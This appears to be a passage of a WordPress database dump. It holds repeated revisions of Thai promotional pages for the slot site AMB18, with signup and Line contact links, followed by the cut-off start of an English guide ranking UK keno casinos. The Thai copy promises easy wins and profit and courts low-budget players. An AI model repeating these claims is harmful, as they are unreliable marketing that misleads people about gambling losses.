ทำให้ผู้เล่นรู้สึกถึงโอกาสในการทำกำไรได้จริงการที่ทางเว็บนำเข้าเกมจากค่ายนี้แบบลิขสิทธิ์แท้จึงช่วยเพิ่มความมั่นใจในคุณภาพและทำให้ทุกการสปินเต็มไปด้วยพลังความมันแบบมืออาชีพ</p><h3><b>ค่ายเกม JOKER GAMING</b></h3><p>JOKER GAMING เป็นอีกค่ายที่สายสล็อตรู้จักกันดีในเรื่องเกมแตกง่ายและมีโบนัสหลากหลาย จุดเด่นอยู่ที่ธีมเกมที่หลากหลายตั้งแต่แนวเอเชียไปจนถึงตะวันตกทำให้ผู้เล่นเลือกสนุกได้ตามสไตล์ตนเอง ระบบเกมถูกพัฒนาให้รองรับการเล่นบนมือถือได้อย่างมีประสิทธิภาพ ภาพไม่กระตุก เสียงชัดเจน การที่ทางเว็บดึงเกมจากค่ายนี้เข้ามาเสริมทัพ จึงทำให้แพลตฟอร์มมีความครบเครื่องมากขึ้น เหมาะสำหรับคนที่ต้องการลุ้นกำไรแบบต่อเนื่องในบรรยากาศที่เร้าใจ</p><h3><b>ค่ายเกม JILI SLOT</b></h3><p>JILI SLOT โดดเด่นในเรื่องการออกแบบเกมที่เน้นความแปลกใหม่และฟีเจอร์พิเศษหลากหลาย หลายเกมมีระบบโบนัสซ้อนโบนัสที่เพิ่มโอกาสรับรางวัลแบบคาดไม่ถึง ภาพกราฟิกทันสมัย โทนสีสดใส ดึงดูดสายตา ทำให้การเล่นไม่น่าเบื่อ นอกจากนี้ยังมีระบบทดลองเล่นให้ผู้เล่นศึกษาแนวทางก่อนลงเงินจริง </p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2> AMB18 สปินมันส์ แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระ เริ่ม 1 บาท\n</h2> <p>สำหรับคนที่มีงบจำกัดในการเข้าเล่นแน่นอนว่าสปินมันส์แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระเริ่ม 1 บาทระบบเปิดโอกาสให้เริ่มต้นด้วยเงินทุนต่ำทำให้ควบคุมความเสี่ยงได้ง่ายผู้เล่นสามารถวางแผนการเล่นตามงบที่มีโดยไม่ต้องกังวลเรื่องขั้นต่ำสูงเกินไป การบริหารทุนจึงทำได้อย่างยืดหยุ่น อีกทั้งยังมีเกมให้เลือกหลายระดับความผันผวน ใครชอบลุ้นรางวัลก้อนใหญ่หรือชอบแตกบ่อยแบบกำไรเล็กสะสมก็เลือกได้ตามสไตล์ เมื่อรวมกับระบบฝากถอนรวดเร็ว ยิ่งช่วยให้การหมุนแต่ละครั้งเต็มไปด้วยความคล่องตัว</p> <h2>แหล่งรวมเกมฮิต น่าเล่นบน เว็บยอดนิยม ที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่น</h2> <p>ความสนุกของทางเว็บนี้ก็คือแหล่งรวมเกมฮิตน่าเล่นบนเว็บยอดนิยมที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่นอยู่ที่การคัดเลือกเกมยอดฮิตติดกระแสมาไว้ครบผู้เล่นไม่ต้องตามหาเกมดังจากหลายที่ เพราะที่นี่รวมมาให้พร้อมสรรพแต่ละเกมมีจุดเด่นเฉพาะตัวทั้งในเรื่องอัตราการจ่ายและฟีเจอร์โบนัสที่หลากหลาย เหมาะสำหรับคนที่ต้องการสัมผัสประสบการณ์เกมคุณภาพระดับสากล พร้อมระบบเสถียรที่รองรับผู้เล่นจำนวนมากได้แบบไม่มีสะดุดทำให้ทุกช่วงเวลาของการหมุนวงล้อเต็มไปด้วยความตื่นเต้นและโอกาสทำกำไร</p><h3><b>AMB18 </b><b>เกม Wild West Gold </b></h3><p>Wild West Gold เป็นเกมสล็อตธีมคาวบอยที่โดดเด่นเรื่องตัวคูณรางวัลและฟีเจอร์ฟรีสปิน บรรยากาศภายในเกมให้ความรู้สึกเหมือนอยู่ในดินแดนตะวันตกสุดดิบ การเรียงสัญลักษณ์สามารถสร้างโอกาสรับรางวัลหลายทิศทาง เพิ่มความเร้าใจในทุกการหมุน เกมนี้ได้รับความนิยมเพราะมีจังหวะแตกที่ชัดเจน</p><h3><b>เกม Bonanza Gold </b></h3><p>Bonanza Gold เป็นเกมสล็อตแนวเหมืองทองที่มาพร้อมระบบจ่ายแบบกลุ่มสัญลักษณ์ เพิ่มความแตกต่างจากสล็อตทั่วไป จุดเด่นคือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อยเรื่อยเมื่อเข้าสู่รอบพิเศษ ทำให้มีโอกาสรับรางวัลก้อนโตแบบต่อเนื่อง ภาพกราฟิกสีทองโดดเด่น สร้างบรรยากาศการลุ้นที่เข้มข้น เกมนี้เหมาะสำหรับคนที่ชอบความท้าทายและการคาดเดาผลลัพธ์ในแต่ละรอบหมุน</p><h3><b>เกม The Dog House Megaways</b></h3><p>The Dog House Megaways เป็นเกมสล็อตที่ใช้ระบบเมกะเวย์ เพิ่มจำนวนวิธีชนะในแต่ละรอบแบบไม่ตายตัว จุดเด่นคือสัญลักษณ์บ้านสุนัขที่ทำหน้าที่เป็นตัวคูณคงที่เมื่ออยู่บนวงล้อ ทำให้มีโอกาสสะสมกำไรได้ต่อเนื่อง ธีมเกมสดใส เล่นเพลิน เหมาะกับคนที่ต้องการทั้งความน่ารักและโอกาสรับรางวัลสูง เมื่อเล่นผ่านทางเว็บผู้เล่นจะสัมผัสได้ถึงความลื่นไหลของระบบและการตอบสนองที่รวดเร็ว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 เว็บนำเข้าเปิดตลอดเวลา เล่นสบาย สล็อต แตก ง่าย ทุน น้อย วอ เลท มาพร้อมโหมดเดโม่ฟรี</h2> <p>เว็บนำเข้าเปิดตลอดเวลาเล่นสบาย <b>สล็อต แตก ง่าย ทุน น้อย วอ เลท </b>มาพร้อมโหมดเดโม่ฟรี ตอบโจทย์ทั้งสายจริงจังและสายทดลอง เพราะมีโหมดเดโม่ให้ลองเล่นก่อนตัดสินใจลงเงินจริง ช่วยให้ผู้เล่นศึกษาเกมและวางแผนการสปินได้แม่นยำมากขึ้น ระบบรองรับการฝากผ่านวอเลท ทำให้ธุรกรรมสะดวกและรวดเร็ว เปิดให้บริการตลอด 24 ชั่วโมง ไม่ว่าจะเล่นเวลาไหนก็เข้าใช้งานได้ทันที ความครบเครื่องทั้งหมดนี้ทำให้การเข้าเล่นกับทางเว็บนี้กลายเป็นอีกหนึ่งแพลตฟอร์มที่ตอบโจทย์คนรุ่นใหม่ที่ต้องการความสะดวก หากอยากมาทดลองเล่นและไม่รู้จะเริ่มต้นอย่างไร เพียงแค่แอด <a href=\"http://luca333line.com\"><b>ไลน์</b></a> สามารถที่จะสอบถามข้อมูลเพิ่มเติมในการเข้าเล่นได้</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-05-19 09:56:19','2026-05-19 09:56:19','',44,'https://amb18slot.com/?p=428',0,'revision','',0),(429,3,'2026-05-19 09:56:20','2026-05-19 09:56:20','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"AMB18\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท\n</h1> <p><a href=\"http://amb18slot.com\"><b>AMB18</b></a> เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลาที่นี่รวมทุกความบันเทิงไว้ครบในที่เดียวไม่ว่าจะเป็นสายหมุนสายทำกำไรหรือมือใหม่ที่เพิ่งเริ่มต้นก็สามารถเข้าถึงได้ง่าย ระบบถูกออกแบบมาให้ใช้งานสะดวกภาพลื่นไหลไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์พร้อมมาตรฐานความปลอดภัยระดับสากล ทำให้ผู้เล่นมั่นใจได้ว่าเงินทุนและข้อมูลส่วนตัวได้รับการดูแลอย่างดี เมื่อรวมกับจุดเด่นเรื่องเริ่มต้นเพียง 1 บาท ยิ่งทำให้แพลตฟอร์มนี้กลายเป็นพื้นที่เล่นเกมที่เข้าถึงได้จริง</p> <h2>สล็อต เว็บ ตรง แตก หนัก 2025 แหล่งรวมเกมอัปเดตเกมเยอะกว่า 1000 ห้องเกม\n</h2> <p>ความโดดเด่นของ <b>สล็อต เว็บ ตรง แตก หนัก 2025 </b>คือการเป็นศูนย์รวมเกมที่อัปเดตใหม่ตลอดทั้งปีภายในระบบมีเกมให้เลือกมากกว่า 1000 ห้องเกม ครอบคลุมทั้งสล็อตคลาสสิก วิดีโอสล็อต และเกมรูปแบบพิเศษที่มาพร้อมฟีเจอร์โบนัสจัดเต็ม </p><p>ผู้เล่นสามารถเลือกแนวที่ชอบได้อย่างอิสระไม่ว่าจะเป็นธีมแฟนตาซี ผจญภัย หรือสไตล์คาวบอยสุดดุเดือด ทุกเกมถูกคัดสรรจากผู้ให้บริการชั้นนำที่มีใบอนุญาตถูกต้อง ทำให้มั่นใจได้ในมาตรฐานความยุติธรรม อีกทั้งระบบยังปรับปรุงความเร็วในการโหลดเกมให้เหมาะกับอินเทอร์เน็ตในประเทศไทย ช่วยให้ทุกการหมุนเป็นไปอย่างลื่นไหลเพิ่มโอกาสลุ้นรางวัลได้แบบเต็มอารมณ์</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-3-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 สุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ สล็อต เว็บ ตรง แตก ง่าย ล่าสุด มาพร้อมค่ายยอดนิยม\n</h2> <p>จุดแข็งอีกอย่างสุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ <b>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </b>คือการรวบรวมค่ายเกมยอดนิยมจากต่างประเทศมาไว้ในระบบเดียวผู้เล่นไม่ต้องเสียเวลาเปิดหลายเว็บให้วุ่นวาย เพราะที่นี่รวมทุกค่ายดังมาให้ครบทั้งสายภาพสวย กราฟิกจัดจ้าน และสายโบนัสแตกถี่ ระบบเซิร์ฟเวอร์เสถียรทำให้เข้าเกมได้รวดเร็วไม่ต้องรอนาน อีกทั้งยังมีการอัปเดตเวอร์ชันใหม่ทันทีที่ค่ายเกมปล่อยออกมาจึงมั่นใจได้ว่าผู้เล่นจะได้สัมผัสประสบการณ์ล่าสุดก่อนใคร พร้อมระบบฝากถอนอัตโนมัติที่ช่วยให้บริหารเงินทุนได้สะดวกรองรับการเล่นต่อเนื่องแบบไม่สะดุด</p><h3><b>ค่ายเกม PG SLOT</b></h3><p>หนึ่งในค่ายยอดนิยมที่ขาดไม่ได้คือ PG SLOT ซึ่งขึ้นชื่อเรื่องกราฟิกคมชัดและเอฟเฟกต์อลังการ เกมส่วนใหญ่มีฟีเจอร์ฟรีสปินและตัวคูณรางวัลที่กระตุ้นความตื่นเต้นทุกครั้งที่หมุน วงล้อถูกออกแบบให้เข้าใจง่าย เหมาะกับทั้งมือใหม่และสายเก็บกำไร อีกทั้งยังมีอัตราการจ่ายที่สมดุล ทำให้ผู้เล่นรู้สึกถึงโอกาสในการทำกำไรได้จริงการที่ทางเว็บนำเข้าเกมจากค่ายนี้แบบลิขสิทธิ์แท้จึงช่วยเพิ่มความมั่นใจในคุณภาพและทำให้ทุกการสปินเต็มไปด้วยพลังความมันแบบมืออาชีพ</p><h3><b>ค่ายเกม JOKER GAMING</b></h3><p>JOKER GAMING เป็นอีกค่ายที่สายสล็อตรู้จักกันดีในเรื่องเกมแตกง่ายและมีโบนัสหลากหลาย จุดเด่นอยู่ที่ธีมเกมที่หลากหลายตั้งแต่แนวเอเชียไปจนถึงตะวันตกทำให้ผู้เล่นเลือกสนุกได้ตามสไตล์ตนเอง ระบบเกมถูกพัฒนาให้รองรับการเล่นบนมือถือได้อย่างมีประสิทธิภาพ ภาพไม่กระตุก เสียงชัดเจน การที่ทางเว็บดึงเกมจากค่ายนี้เข้ามาเสริมทัพ จึงทำให้แพลตฟอร์มมีความครบเครื่องมากขึ้น เหมาะสำหรับคนที่ต้องการลุ้นกำไรแบบต่อเนื่องในบรรยากาศที่เร้าใจ</p><h3><b>ค่ายเกม JILI SLOT</b></h3><p>JILI SLOT โดดเด่นในเรื่องการออกแบบเกมที่เน้นความแปลกใหม่และฟีเจอร์พิเศษหลากหลาย หลายเกมมีระบบโบนัสซ้อนโบนัสที่เพิ่มโอกาสรับรางวัลแบบคาดไม่ถึง ภาพกราฟิกทันสมัย โทนสีสดใส ดึงดูดสายตา ทำให้การเล่นไม่น่าเบื่อ นอกจากนี้ยังมีระบบทดลองเล่นให้ผู้เล่นศึกษาแนวทางก่อนลงเงินจริง </p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2> AMB18 สปินมันส์ แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระ เริ่ม 1 บาท\n</h2> <p>สำหรับคนที่มีงบจำกัดในการเข้าเล่นแน่นอนว่าสปินมันส์แม้มีงบจำกัด ทุนน้อยก็เล่นได้อิสระเริ่ม 1 บาทระบบเปิดโอกาสให้เริ่มต้นด้วยเงินทุนต่ำทำให้ควบคุมความเสี่ยงได้ง่ายผู้เล่นสามารถวางแผนการเล่นตามงบที่มีโดยไม่ต้องกังวลเรื่องขั้นต่ำสูงเกินไป การบริหารทุนจึงทำได้อย่างยืดหยุ่น อีกทั้งยังมีเกมให้เลือกหลายระดับความผันผวน ใครชอบลุ้นรางวัลก้อนใหญ่หรือชอบแตกบ่อยแบบกำไรเล็กสะสมก็เลือกได้ตามสไตล์ เมื่อรวมกับระบบฝากถอนรวดเร็ว ยิ่งช่วยให้การหมุนแต่ละครั้งเต็มไปด้วยความคล่องตัว</p> <h2>แหล่งรวมเกมฮิต น่าเล่นบน เว็บยอดนิยม ที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่น</h2> <p>ความสนุกของทางเว็บนี้ก็คือแหล่งรวมเกมฮิตน่าเล่นบนเว็บยอดนิยมที่มาพร้อมเกมโบนัสแตกบ่อย ที่ควรลองเล่นอยู่ที่การคัดเลือกเกมยอดฮิตติดกระแสมาไว้ครบผู้เล่นไม่ต้องตามหาเกมดังจากหลายที่ เพราะที่นี่รวมมาให้พร้อมสรรพแต่ละเกมมีจุดเด่นเฉพาะตัวทั้งในเรื่องอัตราการจ่ายและฟีเจอร์โบนัสที่หลากหลาย เหมาะสำหรับคนที่ต้องการสัมผัสประสบการณ์เกมคุณภาพระดับสากล พร้อมระบบเสถียรที่รองรับผู้เล่นจำนวนมากได้แบบไม่มีสะดุดทำให้ทุกช่วงเวลาของการหมุนวงล้อเต็มไปด้วยความตื่นเต้นและโอกาสทำกำไร</p><h3><b>AMB18 </b><b>เกม Wild West Gold </b></h3><p>Wild West Gold เป็นเกมสล็อตธีมคาวบอยที่โดดเด่นเรื่องตัวคูณรางวัลและฟีเจอร์ฟรีสปิน บรรยากาศภายในเกมให้ความรู้สึกเหมือนอยู่ในดินแดนตะวันตกสุดดิบ การเรียงสัญลักษณ์สามารถสร้างโอกาสรับรางวัลหลายทิศทาง เพิ่มความเร้าใจในทุกการหมุน เกมนี้ได้รับความนิยมเพราะมีจังหวะแตกที่ชัดเจน</p><h3><b>เกม Bonanza Gold </b></h3><p>Bonanza Gold เป็นเกมสล็อตแนวเหมืองทองที่มาพร้อมระบบจ่ายแบบกลุ่มสัญลักษณ์ เพิ่มความแตกต่างจากสล็อตทั่วไป จุดเด่นคือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อยเรื่อยเมื่อเข้าสู่รอบพิเศษ ทำให้มีโอกาสรับรางวัลก้อนโตแบบต่อเนื่อง ภาพกราฟิกสีทองโดดเด่น สร้างบรรยากาศการลุ้นที่เข้มข้น เกมนี้เหมาะสำหรับคนที่ชอบความท้าทายและการคาดเดาผลลัพธ์ในแต่ละรอบหมุน</p><h3><b>เกม The Dog House Megaways</b></h3><p>The Dog House Megaways เป็นเกมสล็อตที่ใช้ระบบเมกะเวย์ เพิ่มจำนวนวิธีชนะในแต่ละรอบแบบไม่ตายตัว จุดเด่นคือสัญลักษณ์บ้านสุนัขที่ทำหน้าที่เป็นตัวคูณคงที่เมื่ออยู่บนวงล้อ ทำให้มีโอกาสสะสมกำไรได้ต่อเนื่อง ธีมเกมสดใส เล่นเพลิน เหมาะกับคนที่ต้องการทั้งความน่ารักและโอกาสรับรางวัลสูง เมื่อเล่นผ่านทางเว็บผู้เล่นจะสัมผัสได้ถึงความลื่นไหลของระบบและการตอบสนองที่รวดเร็ว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2-1-1-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 เว็บนำเข้าเปิดตลอดเวลา เล่นสบาย สล็อต แตก ง่าย ทุน น้อย วอ เลท มาพร้อมโหมดเดโม่ฟรี</h2> <p>เว็บนำเข้าเปิดตลอดเวลาเล่นสบาย <b>สล็อต แตก ง่าย ทุน น้อย วอ เลท </b>มาพร้อมโหมดเดโม่ฟรี ตอบโจทย์ทั้งสายจริงจังและสายทดลอง เพราะมีโหมดเดโม่ให้ลองเล่นก่อนตัดสินใจลงเงินจริง ช่วยให้ผู้เล่นศึกษาเกมและวางแผนการสปินได้แม่นยำมากขึ้น ระบบรองรับการฝากผ่านวอเลท ทำให้ธุรกรรมสะดวกและรวดเร็ว เปิดให้บริการตลอด 24 ชั่วโมง ไม่ว่าจะเล่นเวลาไหนก็เข้าใช้งานได้ทันที ความครบเครื่องทั้งหมดนี้ทำให้การเข้าเล่นกับทางเว็บนี้กลายเป็นอีกหนึ่งแพลตฟอร์มที่ตอบโจทย์คนรุ่นใหม่ที่ต้องการความสะดวก หากอยากมาทดลองเล่นและไม่รู้จะเริ่มต้นอย่างไร เพียงแค่แอด <a href=\"http://luca333line.com\"><b>ไลน์</b></a> สามารถที่จะสอบถามข้อมูลเพิ่มเติมในการเข้าเล่นได้</p><p style=\"text-align: center;\"><a style=\"color: #ff6600;\" href=\"http://luca333.net\" target=\"_blank\" rel=\"noopener\"><strong>Luca333</strong></a></p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-05-19 09:56:20','2026-05-19 09:56:20','',44,'https://amb18slot.com/?p=429',0,'revision','',0),(432,3,'2026-07-17 11:18:42','2026-07-17 11:18:42','<a href=\"https://member.luca333.net/go/luca333\" target=\"_blank\">\n สมัครสมาชิก\n </a>\n <a href=\"https://member.luca333.net/go/luca333\" target=\"_blank\">\n เข้าสู่ระบบ\n </a>\n <a href=\"http://luca333-line.com\" target=\"_blank\">\n ติดต่อเรา\n </a>','header','','inherit','closed','closed','','32-revision-v1','','','2026-07-17 11:18:42','2026-07-17 11:18:42','',32,'https://amb18b.com/?p=432',0,'revision','',0),(433,6969,'2026-07-17 11:18:42','2026-07-17 11:18:42','<h1>Best Keno Online Casino UK 2026: Top-Rated Sites for Real Money Keno</h1>\n<p>Keno sits in that odd corner of the casino floor where bingo meets the lottery, and it doesn\'t shout for attention. Slots get the flashy billboards. Blackjack gets the strategy books. Keno gets a quiet corner, a few regulars, and a paytable that rarely makes headlines. But UK players who like numbered balls and the occasional four-figure win for a tiny stake know exactly where to look. This guide covers the best keno online casinos in the UK for 2026, what separates a decent keno site from a waste of time, and which licensed operators actually deliver a fair game.</p>\n<p>Short answer up front: bet365, 888casino, William Hill, and Betfred remain the strongest UK-licensed keno casinos for most players. They offer RNG keno and, in some cases, live keno draws, with transparent paytables and banking that doesn\'t drag. If you want mobile-first keno, LeoVegas and Mr Green are worth a look. Avoid offshore keno casinos without a UKGC licence; they\'re not just illegal to advertise in the UK, they also tend to vanish when you win.</p>\n<p>That\'s the quick read. The rest of this page goes into the details: how keno actually works, where the house edge hides, which bonuses help and which ones are decorative, and how to pick a keno casino for the way you play.</p>\n<h2>Best Keno Casinos UK 2026: Comparison Table</h2>\n<p>The table below ranks the top licensed keno casinos for UK players. Every operator holds a UK Gambling Commission licence, offers real money keno, and accepts UK players. Bonus amounts change often, so the table lists bonus types rather than a number pulled from a promotion page that may be gone by next week.</p>\n<table>\n<thead>\n<tr><th>Casino</th><th>Bonus</th><th>Keno Variants</th><th>Min Deposit</th><th>Payout Speed</th><th>Standout Feature</th></tr>\n</thead>\n<tbody>\n<tr><td>bet365 Casino</td><td>Deposit match welcome bonus</td><td>RNG keno, live keno</td><td>£5</td><td>1–2 days</td><td>Best all-round licensed keno casino</td></tr>\n<tr><td>888casino</td><td>No-deposit free play plus deposit bonus</td><td>RNG keno</td><td>£10</td><td>1–3 days</td><td>Exclusive keno games</td></tr>\n<tr><td>William Hill Casino</td><td>Deposit match welcome bonus</td><td>RNG keno, live keno</td><td>£10</td><td>1–2 days</td><td>Wide range of keno paytables</td></tr>\n<tr><td>Betfred Casino</td><td>Deposit match plus free spins</td><td>RNG keno</td><td>£10</td><td>1–3 days</td><td>Known for keno tournaments</td></tr>\n<tr><td>Grosvenor Casinos</td><td>Deposit match welcome bonus</td><td>RNG keno, live keno</td><td>£20</td><td>1–2 days</td><td>Land-based and online crossover</td></tr>\n<tr><td>LeoVegas Casino</td><td>Deposit match plus free spins</td><td>RNG keno, mobile keno</td><td>£10</td><td>1–2 days</td><td>Best mobile keno app</td></tr>\n<tr><td>Mr Green Casino</td><td>Deposit match welcome bonus</td><td>RNG keno</td><td>£10</td><td>1–3 days</td><td>Clean interface, clear paytables</td></tr>\n<tr><td>Casumo Casino</td><td>Deposit match welcome bonus</td><td>RNG keno</td><td>£10</td><td>1–2 days</td><td>Fast withdrawals</td></tr>\n<tr><td>Unibet Casino</td><td>Deposit match welcome bonus</td><td>RNG keno</td><td>£10</td><td>1–3 days</td><td>Good odds display</td></tr>\n<tr><td>Betway Casino</td><td>Deposit match welcome bonus</td><td>RNG keno</td><td>£10</td><td>1–2 days</td><td>Reliable software</td></tr>\n</tbody>\n</table>\n<p>The comparison is intentionally blunt. A deposit match isn\'t a reason to pick a casino on its own. You need to read the turnover terms, the game weighting, and the maximum win cap. Keno often contributes less than 100% to wagering requirements, sometimes as low as 25% or 50%. That turns a £50 bonus into a long grind before you can withdraw a penny.</p>\n<h2>How We Ranked the Best Keno Casinos</h2>\n<p>We didn\'t rank these casinos by how pretty their homepage looks. The list above came out of a few practical tests that matter for keno players specifically.</p>\n<p>First, the UKGC licence is non-negotiable. Any casino without one is off the list. If a site claims to accept UK players but doesn\'t show a licence number from the Gambling Commission, it\'s either breaking the law or operating from somewhere with no interest in your protection. Second, the keno game itself. Some casinos bury keno in a submenu under \"other games\", and the paytable is a PDF from 2019. We gave extra weight to sites that offer more than one keno variant, especially live keno with a real draw you can watch.</p>\n<p>Banking speed matters because keno winnings tend to be small and frequent. A casino that takes five days to process a £30 withdrawal is less useful than one that pays within 48 hours. We also looked at minimum deposits, because keno shouldn\'t require a £50 entry fee. Most of the listed casinos let you start with a tenner.</p>\n<p>Mobile experience counts too. Keno is a quick game; if the app crashes on an iPhone 13 or the buttons are too small to hit without zooming, it\'s not a serious option. Finally, we checked bonus terms, because a keno casino that advertises \"100 free spins\" but excludes keno from the bonus is wasting your time.</p>\n<h2>What Is Keno and How Does It Work?</h2>\n<p>Keno is a lottery-style game that predates most casino games. The basics: there are 80 numbered balls, from 1 to 80. You pick between one and twenty numbers, called spots. The game then draws twenty numbers at random. Your payout depends on how many of your spots match the drawn numbers and how many spots you selected.</p>\n<p>In a land-based casino, keno draws happen every few minutes with a machine blowing numbered balls or a random number generator. Online, the RNG does the same job instantly. You pick your numbers, set your stake, and hit play. The result appears in seconds. Some UK casinos also offer live keno, where a presenter or a physical ball machine runs the draw on a schedule, and you watch it happen.</p>\n<p>The appeal of keno is the long odds. Hitting 10 out of 10 on a ten-spot game is rare, but the payout can be enormous relative to the stake. That\'s the lottery dream without leaving your sofa. The downside is the house edge, which is usually higher than on slots or table games. Keno RTP typically sits between 70% and 90%, depending on the paytable and how many numbers you pick. That\'s a wide range, and it means you need to check the game\'s info page before you play.</p>\n<p>One thing UK players often miss: keno is not a game of skill. You can pick birthdays, lucky numbers, or the same six every time. It doesn\'t matter. The draw doesn\'t care about your pattern. That\'s not a flaw, it\'s the design. But it means keno strategy is mostly about bankroll management and choosing a paytable with the best return, not about predicting the next ball.</p>\n<p class=\"dcm-resource-link\"><a href=\"https://skrillcasinosites.com/\">skrillcasinosites.com</a></p>\n<h2>How to Play Keno Online in the UK</h2>\n<p>Playing keno online takes about thirty seconds once you\'ve found a casino. If you\'ve never done it, here\'s the process without the fluff.</p>\n<p>First, sign up at one of the licensed keno casinos from the table above. You\'ll need to verify your identity before you can withdraw, but you can usually deposit and play straight away. Choose a keno game from the casino\'s menu. Most sites list it under \"numbers games\" or \"specialty games\". Pick your numbers. You can choose from one to twenty spots, but the sweet spot for manageable volatility is usually four to ten spots. Fewer spots gives more frequent smaller wins; more spots gives the chance of a big hit but more losing sessions in between.</p>\n<p>Set your stake. Keno minimums at UK casinos are often £0.10 or £0.20 per game, so you don\'t need a big bankroll. Hit play and watch the draw. If you match enough numbers, the casino credits your balance automatically. If you want to play the same numbers repeatedly, most online keno games have an autoplay feature, but be careful with that. Autoplay can burn through a balance faster than you think.</p>\n<p>One practical tip: always check the paytable before you play. Two keno games can look identical but have very different payouts for the same number of hits. A game that pays £25 for five out of five is better than one that pays £18. The RTP difference can be several percentage points, and over a long session that adds up.</p>\n<h2>Keno Odds, Payouts and RTP: Where the House Edge Hides</h2>\n<p>Keno payouts are not standardized. Unlike blackjack, where the rules are largely fixed, keno paytables vary from casino to casino and even from game to game within the same casino. That\'s both a problem and an opportunity. The problem is you can\'t assume all keno games are equal. The opportunity is that a savvy player can spot the better paytable in a few seconds.</p>\n<p>The house edge in keno comes from the difference between the true odds of hitting a certain number of spots and the payout the casino offers. For example, the odds of hitting five out of five when you pick five numbers are roughly 1 in 1,551. If the casino pays 500 to 1 for that hit, the house keeps a huge margin. If it pays 800 to 1, the game is better, though still far from generous. That\'s why keno RTP often sits below 90%.</p>\n<p>UK casinos rarely publish the RTP for individual keno games on the main page. You often have to open the game\'s info sheet or help file. If you can\'t find the RTP, assume the game is on the lower end of the scale. Some software providers, like 